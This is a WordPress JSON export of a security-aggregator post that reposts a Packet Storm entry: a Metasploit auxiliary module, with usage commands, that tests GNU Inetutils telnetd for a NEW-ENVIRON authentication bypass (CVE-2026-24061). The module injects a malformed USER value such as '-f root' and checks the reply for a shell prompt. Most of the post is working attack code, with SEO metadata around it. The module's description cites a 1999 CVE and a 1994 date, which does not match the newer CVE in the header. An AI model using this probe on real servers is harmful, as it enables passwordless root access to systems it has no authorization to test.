{"id":37899,"date":"2026-01-28T12:45:52","date_gmt":"2026-01-28T12:45:52","guid":{"rendered":"http:\/\/localhost\/?p=37899"},"modified":"2026-01-28T12:45:52","modified_gmt":"2026-01-28T12:45:52","slug":"gnu-inetutils-27-telnet-authentication-bypass-scanner","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=37899","title":{"rendered":"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:54:54&#8243;,&#8221;description&#8221;:&#8221;GNU Inetutils version 2.7 telnet authentication bypass scanner that leverages a crafted USER value. This vulnerability is tracked as CVE-2026-24061 and is conceptually related to historical Telnet NEW-ENVIRON issues such as CVE-1999-0192, but affects&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-28T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-28T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214468&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-1999-0192&#8243;,&#8221;CVE-2026-24061&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : GNU Inetutils 2.7 Telnet NEW\u2011ENVIRON Authentication Bypass Scanner                                                           |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : System built\u2011in component. No standalone download available.                                                                |\\n    =============================================================================================================================================\\n    \\n    [+] References :  https:\/\/packetstorm.news\/files\/id\/214219\/ \\u0026 CVE-2026-24061 \\n    \\n    [+] Summary    : This Metasploit auxiliary scanner detects a Telnet authentication bypass vulnerability related to improper handling of the NEW-ENVIRON option during Telnet negotiation. \\n                     The issue allows an attacker to inject a malformed USER environment variable (for example, using flags such as -f root) when the server requests environment variables. \\n    \\t\\t\\t\\t Affected Telnet daemons may incorrectly trust this input, potentially bypassing password authentication and granting immediate shell access.\\n                     The module passively listens for the IAC SB NEW-ENVIRON SEND request, then responds with a crafted subnegotiation payload to test whether the target accepts the malicious USER value. \\n    \\t\\t\\t\\t It verifies success by analyzing server responses for common indicators of a successful login or shell prompt. When exploitation indicators are detected, \\n    \\t\\t\\t\\t the module reports the vulnerability in the Metasploit database.\\n                     This scanner is intended for security assessment and detection purposes against vulnerable Telnet servers, including implementations such as GNU Inetutils telnetd up to affected versions, \\n    \\t\\t\\t\\t and aligns conceptually with historical NEW-ENVIRON authentication bypass issues (e.g., CVE-1999-0192 and related Telnet environment variable flaws).\\n    \\n    [+] Usage : \\n    \\n    # View available options\\n    \\n    show options\\n    \\n    # Set target(s)\\n    \\n    set RHOSTS \\u003ctarget_IP_or_range\\u003e\\n    \\n    # Example: set RHOSTS 192.168.1.1\\n    \\n    # Or for a range: set RHOSTS 192.168.1.1-254\\n    \\n    # Optional: Change port if Telnet is on non-standard port\\n    \\n    set RPORT 2323\\n    \\n    # Optional: Adjust timeout (default: 5 seconds)\\n    \\n    set TIMEOUT 10\\n    \\n    # Optional: Change payload (default: \\&#8221;-f root\\&#8221;)\\n    \\n    set USER_PAYLOAD \\&#8221;-f admin\\&#8221;\\n    \\n    [+] POC :\\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      Rank = NormalRanking\\n    \\n      include Msf::Auxiliary::Scanner\\n      include Msf::Auxiliary::Report\\n      include Msf::Exploit::Remote::Telnet\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;Telnet NEW-ENVIRON Authentication Bypass Scanner&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module scans Telnet servers for the historical NEW-ENVIRON\\n            authentication bypass vulnerability (CVE-1999-0192).\\n    \\n            Vulnerable Telnet daemons may incorrectly process environment\\n            variables supplied during NEW-ENVIRON negotiation. By injecting\\n            a malformed USER value (e.g., \\&#8221;-f root\\&#8221;), authentication checks\\n            may be bypassed.\\n    \\n            This module detects and confirms the bypass condition only.\\n            It does NOT execute commands or create a session.\\n          },\\n          &#8216;Author&#8217;         =\\u003e\\n            [\\n              &#8216;indoushka&#8217;\\n            ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e\\n            [\\n              [&#8216;CVE&#8217;, &#8216;1999-0192&#8217;],\\n              [&#8216;RFC&#8217;, &#8216;1572&#8217;]\\n            ],\\n          &#8216;DisclosureDate&#8217; =\\u003e &#8216;1994-12-12&#8217;\\n        ))\\n    \\n        register_options(\\n          [\\n            Opt::RPORT(23),\\n            OptString.new(\\n              &#8216;USER_PAYLOAD&#8217;,\\n              [\\n                true,\\n                &#8216;Malformed USER environment value&#8217;,\\n                &#8216;-f root&#8217;\\n              ]\\n            ),\\n            OptInt.new(\\n              &#8216;TIMEOUT&#8217;,\\n              [\\n                true,\\n                &#8216;Timeout for Telnet negotiation (seconds)&#8217;,\\n                5\\n              ]\\n            )\\n          ]\\n        )\\n      end\\n    \\n      def run_host(ip)\\n        begin\\n          connect\\n          print_status(\\&#8221;#{ip}:#{rport} &#8211; Connected to Telnet service\\&#8221;)\\n    \\n          self.sock.telnet_options[:negotiation] = false\\n    \\n          new_environ_requested = false\\n    \\n          ::Timeout.timeout(datastore[&#8216;TIMEOUT&#8217;]) do\\n            loop do\\n              data = sock.get_once(-1, 1)\\n              break if data.nil?\\n    \\n              if data.include?(\\&#8221;\\\\xff\\\\xfa\\\\x27\\\\x01\\&#8221;)\\n                new_environ_requested = true\\n                print_good(\\&#8221;#{ip}:#{rport} &#8211; NEW-ENVIRON request detected\\&#8221;)\\n    \\n                buf  = \\&#8221;\\\\xff\\\\xfa\\\\x27\\\\x00\\&#8221;\\n                buf += \\&#8221;\\\\x00USER\\&#8221;\\n                buf += \\&#8221;\\\\x01\\&#8221;\\n                buf += datastore[&#8216;USER_PAYLOAD&#8217;]\\n                buf += \\&#8221;\\\\xff\\\\xf0\\&#8221;\\n    \\n                print_status(\\&#8221;#{ip}:#{rport} &#8211; Sending USER=#{datastore[&#8216;USER_PAYLOAD&#8217;]}\\&#8221;)\\n    \\n                Rex.sleep(1)\\n                response = sock.get_once(-1, datastore[&#8216;TIMEOUT&#8217;])\\n    \\n                if response \\u0026\\u0026 response =~ \/(last login|welcome|login successful|[#\\\\$]\\u003e)\/i\\n                  print_good(\\&#8221;#{ip}:#{rport} &#8211; AUTHENTICATION BYPASS CONFIRMED\\&#8221;)\\n                  print_status(\\&#8221;#{ip}:#{rport} &#8211; Server response: #{response.strip}\\&#8221;)\\n    \\n                  report_vuln(\\n                    host: ip,\\n                    port: rport,\\n                    proto: &#8216;tcp&#8217;,\\n                    name: self.name,\\n                    refs: self.references,\\n                    info: \\&#8221;Authentication bypass via NEW-ENVIRON (USER=#{datastore[&#8216;USER_PAYLOAD&#8217;]})\\&#8221;\\n                  )\\n                else\\n                  print_status(\\&#8221;#{ip}:#{rport} &#8211; Payload sent, but bypass not confirmed\\&#8221;)\\n                end\\n    \\n                break\\n              end\\n            end\\n          end\\n    \\n          unless new_environ_requested\\n            print_error(\\&#8221;#{ip}:#{rport} &#8211; NEW-ENVIRON was not requested (likely not vulnerable)\\&#8221;)\\n          end\\n    \\n        rescue ::Timeout::Error\\n          print_error(\\&#8221;#{ip}:#{rport} &#8211; Timeout during Telnet negotiation\\&#8221;)\\n        rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\\n        rescue ::EOFError\\n          print_error(\\&#8221;#{ip}:#{rport} &#8211; Server closed the connection\\&#8221;)\\n        rescue ::Interrupt\\n          raise\\n        rescue ::Exception =\\u003e e\\n          print_error(\\&#8221;#{ip}:#{rport} &#8211; Unexpected error: #{e.class} &#8211; #{e.message}\\&#8221;)\\n        ensure\\n          disconnect\\n        end\\n      end\\n    end\\n    \\n    \\t\\n    Greetings to :============================================================\\n    jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n    ==========================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214468&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C&#8221;,&#8221;version&#8221;:&#8221;2.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214468\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:54:54&#8243;,&#8221;description&#8221;:&#8221;GNU Inetutils version 2.7 telnet authentication bypass scanner that leverages a crafted USER value. This vulnerability is tracked as CVE-2026-24061 and is conceptually related to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-37899","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=37899\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:54:54&#8243;,&#8221;description&#8221;:&#8221;GNU Inetutils version 2.7 telnet authentication bypass scanner that leverages a crafted USER value. This vulnerability is tracked as CVE-2026-24061 and is conceptually related to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=37899\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-28T12:45:52+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37899#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37899\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468\",\"datePublished\":\"2026-01-28T12:45:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37899\"},\"wordCount\":1027,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37899#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37899\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37899\",\"name\":\"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-28T12:45:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37899#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37899\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37899#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=37899","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-28T17:54:54&#8243;,&#8221;description&#8221;:&#8221;GNU Inetutils version 2.7 telnet authentication bypass scanner that leverages a crafted USER value. This vulnerability is tracked as CVE-2026-24061 and is conceptually related to...","og_url":"https:\/\/zero.redgem.net\/?p=37899","og_site_name":"zero redgem","article_published_time":"2026-01-28T12:45:52+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=37899#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=37899"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468","datePublished":"2026-01-28T12:45:52+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=37899"},"wordCount":1027,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-10.0","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=37899#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=37899","url":"https:\/\/zero.redgem.net\/?p=37899","name":"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-28T12:45:52+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=37899#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=37899"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=37899#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner_PACKETSTORM:214468"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37899","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=37899"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37899\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=37899"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=37899"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=37899"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}